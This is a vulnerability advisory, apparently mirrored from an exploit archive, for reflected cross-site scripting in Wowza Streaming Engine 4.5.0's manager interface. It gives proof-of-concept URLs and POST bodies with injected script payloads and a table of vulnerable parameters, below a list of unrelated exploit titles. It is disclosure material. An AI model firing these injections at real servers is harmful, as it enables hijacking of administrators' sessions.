
10 new exploits Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit Simplog 0.9.3 - (tid) SQL Injection Skulltag <= 0.96f - (Version String) Remote Format String PoC OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit Skulltag 0.96f - (Version String) Remote Format String PoC OpenTTD 0.4.7 - Multiple Vulnerabilities Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC) Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion phpMyAgenda 3.0 Final - (rootagenda) Remote Include Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit X7 Chat 2.0 - (help_file) Remote Command Execution Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit Auction 1.3m - (phpbb_root_path) Remote File Inclusion acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit AWStats 6.5 - (migrate) Remote Shell Command Injection acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit acFTP FTP Server 1.4 - (USER) Remote Denial of Service PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit ACal <= 2.2.6 - (day.php) Remote File Inclusion EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion PHP-Fusion 6.00.306 - Multiple Vulnerabilities Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion ACal 2.2.6 - (day.php) Remote File Inclusion EQdkp 1.3.0 - (dbal.php) Remote File Inclusion Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4) Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit \o - Local File Inclusion (1st) Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1) PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1) Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1) Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes) Django CMS 3.3.0 - (Editor Snippet) Persistent XSS Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit) Linux/x86 - execve /bin/sh Shellcode (19 bytes) Wowza Streaming Engine 4.5.0 - Local Privilege Escalation Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF Wowza Streaming Engine 4.5.0 - Multiple XSS OpenSSHD <= 7.2p2 - Username Enumeration WordPress Video Player Plugin 1.5.16 - SQL Injection
117 lines
8.7 KiB
Text
Executable file
117 lines
8.7 KiB
Text
Executable file
|
|
Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities
|
|
|
|
|
|
Vendor: Wowza Media Systems, LLC.
|
|
Product web page: https://www.wowza.com
|
|
Affected version: 4.5.0 (build 18676)
|
|
Platform: JSP
|
|
|
|
Summary: Wowza Streaming Engine is robust, customizable, and scalable
|
|
server software that powers reliable video and audio streaming to any
|
|
device. Learn the benefits of using Wowza Streaming Engine to deliver
|
|
high-quality live and on-demand video content to any device.
|
|
|
|
Desc: Wowza Streaming Engine suffers from multiple reflected cross-site
|
|
scripting vulnerabilities when input passed via several parameters to
|
|
several scripts is not properly sanitized before being returned to the
|
|
user. This can be exploited to execute arbitrary HTML and script code
|
|
in a user's browser session in context of an affected site.
|
|
|
|
Tested on: Winstone Servlet Engine v1.0.5
|
|
Servlet/2.5 (Winstone/1.0.5)
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5343
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
|
|
|
|
|
|
03.07.2016
|
|
|
|
--
|
|
|
|
|
|
http://localhost:8088/enginemanager/applications/live/main/view.htm?vhost=_defaultVHost_&appName=live<script>alert(1)</script>
|
|
http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3A42%3A32%2B02%3A00&periodEnd=2016-07-03T14%3a42%3a32%2b02%3a00<script>alert(2)</script>
|
|
http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3a42%3a32%2b02%3a00<script>alert(3)</script>&periodEnd=2016-07-03T14%3A42%3A32%2B02%3A00
|
|
http://localhost:8088/enginemanager/applications/liveedge/securityplayback/edit.htm?appName=test<script>alert(4)</script>&vhost=_defaultVHost_
|
|
|
|
---
|
|
|
|
POST /enginemanager/applications/liveedge/main/edit.htm
|
|
Host: localhost:8088
|
|
|
|
vhost=_defaultVHost_";alert(5)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(6)</script>§ion=main&version=1467548313123&action=new&description=desctest&mpegDash=true&_mpegDash=on&appleHLS=true&_appleHLS=on&adobeRTMP=true&_adobeRTMP=on&adobeHDS=true&_adobeHDS=on&msSmooth=true
|
|
|
|
---
|
|
|
|
POST /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm
|
|
Host: localhost:8088
|
|
|
|
vhost=_defaultVHost_&uiAppName=test";alert(7)//&uiAppType=Live+Edge+Application&instanceName=";alert(8)//§ion=publishers_panasonic_camcorder";alert(9)//&version=0&driverName=Panasonic&publishersStreamFileName=panasonicstreamname&cameraIpAddress=1.1.1.1&appType=liveedge";alert(10)//&appName=test
|
|
|
|
---
|
|
|
|
POST /enginemanager/applications/liveedge/securityplayback/edit.htm HTTP/1.1
|
|
Host: localhost:8088
|
|
|
|
vhost=_defaultVHost_";alert(11)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(12)</script>§ion=securityplayback&version=1467549110876&_requireSecureRTMPConnection=on&secureTokenState=Protect+all+protocols+using+hash+(SecureToken+version+2)&sharedSecret=sharedtestsecret&hashAlgorithm=SHA
|
|
|
|
---
|
|
|
|
POST /enginemanager/applications/liveedge/streamtarget/add.htm HTTP/1.1
|
|
Host: localhost:8088
|
|
|
|
enabled=true&protocol=RTMP&destinationName=akamai&destApplicationRequired=false&destAppInstanceRequired=false&usernameRequired=true&passwordRequired=true&wowzaCloudDestinationType=1*/alert(13)//&facebookAccessToken=&facebookDestName=&facebookDestId=&facebookEventSourceName=&wowzaDotComFacebookUrl=https%3A%2F%2Ffb.wowza.com%2Fwsem%2Fstream_targets%2Fv1&connectionCode=&protocolShoutcast=Shoutcast
|
|
|
|
---
|
|
|
|
-------------------------------------------------------------------------------------------------------------------
|
|
| Script | Parameter |
|
|
-------------------------------------------------------------------------------------------------------------------
|
|
| |
|
|
/enginemanager/applications/live/main/view.htm | appName |
|
|
/enginemanager/applications/liveedge/main/edit.htm | uiAppType |
|
|
/enginemanager/applications/liveedge/main/edit.htm | vhost |
|
|
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | appType |
|
|
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | instanceName |
|
|
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | section |
|
|
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | uiAppType |
|
|
/enginemanager/applications/liveedge/securityplayback/edit.htm | appName |
|
|
/enginemanager/applications/liveedge/securityplayback/edit.htm | uiAppType |
|
|
/enginemanager/applications/liveedge/securityplayback/edit.htm | vhost |
|
|
/enginemanager/applications/liveedge/streamtarget/add.htm | wowzaCloudDestinationType |
|
|
/enginemanager/applications/liveedge/streamtarget/wizard.htm | appName |
|
|
/enginemanager/applications/liveedge/streamtarget/wizard.htm | vhost |
|
|
/enginemanager/applications/monitoring/historical.jsdata | periodEnd |
|
|
/enginemanager/applications/monitoring/historical.jsdata | periodStart |
|
|
/enginemanager/applications/new.htm | uiAppName |
|
|
/enginemanager/server/mediacachesource/edit.htm | action |
|
|
/enginemanager/server/mediacachesource/edit.htm | maxTTLDays |
|
|
/enginemanager/server/mediacachesource/edit.htm | maxTTLHours |
|
|
/enginemanager/server/mediacachesource/edit.htm | maxTTLMinutes |
|
|
/enginemanager/server/mediacachesource/edit.htm | maxTTLSeconds |
|
|
/enginemanager/server/mediacachesource/edit.htm | minTTLDays |
|
|
/enginemanager/server/mediacachesource/edit.htm | minTTLHours |
|
|
/enginemanager/server/mediacachesource/edit.htm | minTTLMinutes |
|
|
/enginemanager/server/mediacachesource/edit.htm | minTTLSeconds |
|
|
/enginemanager/server/mediacachestore/edit.htm | action |
|
|
/enginemanager/server/transcoderencode/edit.htm | action |
|
|
/enginemanager/server/transcoderencode/edit.htm | appType |
|
|
/enginemanager/server/transcoderencode/edit.htm | templateName |
|
|
/enginemanager/server/vhost/streamfile/new.htm | streamName |
|
|
/enginemanager/transcoder/new.htm | appType |
|
|
/enginemanager/transcoder/new.htm | dstTemplate |
|
|
/enginemanager/applications/monitoring/app.jsdata | appName |
|
|
/enginemanager/applications/monitoring/historical.jsdata | appName |
|
|
/enginemanager/applications/monitoring/historical.jsdata | vhost |
|
|
/enginemanager/server/logs/getlog.jsdata | filter |
|
|
/enginemanager/server/logs/getlog.jsdata | logMode |
|
|
/enginemanager/server/logs/getlog.jsdata | logName |
|
|
/enginemanager/server/logs/getlog.jsdata | logType |
|
|
| |
|
|
---------------------------------------------------------------------------------|--------------------------------|
|